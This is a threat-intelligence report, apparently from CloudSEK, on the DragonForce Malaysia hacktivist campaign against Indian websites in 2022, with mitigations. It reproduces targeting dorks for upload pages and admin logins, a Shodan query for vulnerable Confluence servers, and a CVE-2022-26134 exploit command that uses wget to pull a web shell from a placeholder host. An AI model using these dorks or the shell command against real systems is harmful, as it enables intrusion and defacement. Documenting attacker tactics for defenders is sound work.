# Techniques, Tactics & Procedures (TTPs) Employed by Hacktivist Group DragonForce Malaysia **cloudsek.com/threatintelligence/techniques-tactics-procedures-ttps-employed-by-hacktivist-group-dragonforce-** malaysia/ July 28, 2022 **Category: Adversary** **Intelligence** ## Executive Summary **Industry:** **Multiple** **Motivation:** **Hacktivism** **Country:** **India** **THREAT** **IMPACT** **MITIGATION** ----- **DragonForce has** **been actively** **targeting Indian** **entities under** **#OpsPatuk and** **#OpsIndia.** **Threat actor** **groups from** **Pakistan, Turkey,** **and Palestine have** **joined the** **campaign.** ## Analysis & Attribution **Information from Social Media** **Breach of some sensitive** **Government websites** **containing PII, military** **operations, and other** **government secrets.** **Implement Anti-** **DDoS** **technologies** **Utilize specially** **designed network** **equipment.** **Internet hosting** **providers and** **Government** **Cyber Response** **Teams to be on** **high alert.** [On 10 June 2022, CloudSEK’s contextual AI digital risk platform XVigil discovered a](https://cloudsek.com/) Tweet posted by the Malaysian hacktivist group, DragonForce, calling for attacks on Indian Government websites by Muslim hackers all around the world. The group’s primary objective of the attack was to get back at the Indian Government for controversial comments on Prophet Muhammad by some Indian politicians. Since then, the group and its supporters have compromised more than 3,000 government and non-government organizations, military websites, and private entities. The compromised entities include BJP (the ruling party of India), Army veteran websites, academic institutes, etc. **About their Servers** The group uses two DNS servers, “annabel.ns.cloudflare.com” and **“nicolas.ns.cloudflare.com” with 104.21.35.227, and 172.67.180.87 being the IP** addresses of the servers respectively. It was discovered that the DragonForce domain was hosted along with multiple Russian, Australian, Chinese, and other websites alongside multiple adult domains. ## Techniques, Tactics, & Procedures (TTPs) The three primary attack vectors used by the group and its supporters are as follows and as expressed in the flow diagram: Google Dorking Shodan Dorks DDoS Attacks ----- Flow diagram illustrating an overview of the TTP employed by the DragonForce group and its partners **Google Dorks** Google Dorks are the primary source of the group's targets, which is confirmed from the following image of a Tiktok video made by one of DragonForce's allies: Image from a PoC video of a partner of DragonForce revealing Google Dorks in search ----- The Google Dorks list included dorks for finding various educational institutions, wherein dorks relating to academic and campus logins were found. The full list contains around 360 google dorks which could have been abused for numerous malicious purposes. A few significant dorks from the list are mentioned: **Google Dorks** **inurl:/admin/upload/ : Ministry of** **Knowledge & Resource sharing** **“allowed file types: png gif jpg txt** **site:gov.in” : Google dork to upload shell** **html files into the server** **inurl/mnux = campus login : Academic** **institutions with Campus login parameter** **inurl/mnux = administrative academic** **login : Academic institutions with** **Administrative academic login parameter** **inurl:admin/upload.php : For sites with** **upload feature that actors could exploit** **for shell using script deface** **inurl: /login/login.php admin: For Admin** **logins into websites using PHP** **language** **php?id= site:in: Indian sites with ID** **parameter that can be abused and URL** **manipulation could be performed** **inurl/mnux = academic login : Academic** **institutions with Academic login** **parameter** **inurl: /admin/cp.php : Reveals all sites** **with Control panel which can provide** **access to the server.** **Shodan Dorks and Atlassian Confluence Vulnerability** A PoC was shared for the exploit of the Atlassian Confluence vulnerability along with the Shodan dork for Confluence Server vulnerabilities targeted towards the Indian region. **Shodan Dork: http.favicon.hash:-305179312 country:"IN"** The actor also shared a GitHub repository script which can be downloaded and exploited using the following python command: **CVE-2022-26134.py http://targets.com “wget https://site.com/shell.txt -O DFM.php** **DDoS Attacks (HTTP Flooding)** The group invited its members and other users on the forum to conduct the DDoS attack where they shared an infographic stating the website, IP addresses, and the port of the target. ----- Infographic shared by DragonForce group for OpsIndia/OpsPatuk The group used a tool called HTTPFLOOD (aka “./404FOUND.MY”), which manipulates and posts unwanted requests to bring down a web server or application. The tool has been built in Python language and it takes the following three inputs: A target URL A Proxy list Number of threads (i.e count of requests to be sent to the server) Further analysis found that the user 'SKYSG404' built the HTTPFLOOD tool, and that both the tool and the Github account hosting it were created on 12 June 2022. ----- Screenshot of the Github account hosting HTTPFLOOD(./404found.my) ### Compromising Servers It was observed that a large number of domains being targeted, resolved to a common IP where they were hosted. The attackers appeared to have gained access to the server via an injection vulnerability on one of the websites. Once a server is compromised, all the websites hosted on it easily fall prey to the attackers, as seen in the pie chart below. Pie chart depicting common IP being shared by multiple Domain names As witnessed in the table given below, almost 61% of the domains compromised belonged to E2ENetworks.in which is based in Delhi, India. Another major chunk, 20.8%, of hacked domains belonged to Atria Convergence **Technologies Pvt. Ltd.** ----- Jointly, both of these ISPs constitute around 81% of the compromised websites. **Share of Domain names resolving to common IP and ISP Information** **IP** **Percentage** **Location** **Name of ISP** **164.52.212.58** **40.1** **216.48.179.60** **20.8** **183.83.180.226** **20.8** **Saidabad, New Delhi,** **India** **E2ENetworks.in** **Saidabad, New Delhi,** **India** **E2ENetworks.in** **Lucknow, Uttar** **Pradesh, India** **Atria Convergence** **Technologies pvt ltd** **120.138.4.218** **8.2** **Valsad, Gujarat, India** **SHREENET** **103.115.194.39** **4.8** **Mumbai, India** **Netmagic Datacenter Mumbai** ## Impact & Mitigation **Impact** **Mitigation** **Escalation of such campaigns on a** **global level can lead to atrocious** **consequences for the Indian** **government and entities.** **Exposed data would equip** **malicious actors with details** **required to launch sophisticated** **attacks.** **Attacks on defense infrastructure** **can lead to sensitive information** **being compromised and cause a** **national security issue.** ## References Appendix **Patch vulnerable and exploitable** **endpoints.** **Monitor for anomalies in user** **accounts and internet-exposed** **web applications, indicating** **possible account takeovers.** **Scan repositories to identify** **exposed credentials and secrets.** **Monitor cybercrime forums for the** **latest tactics employed by threat** **actors.** ----- Mumbai University’s website server was down in the aftermath of the DDOS attack Infographic shared by DragonForce group for OpsIsrael/OpsBedil ----- annabel.ns.cloudflare.com DNS server with 2110 hosted domains. nicolas.ns.cloudflare.com DNS server with 3909 hosted domains. -----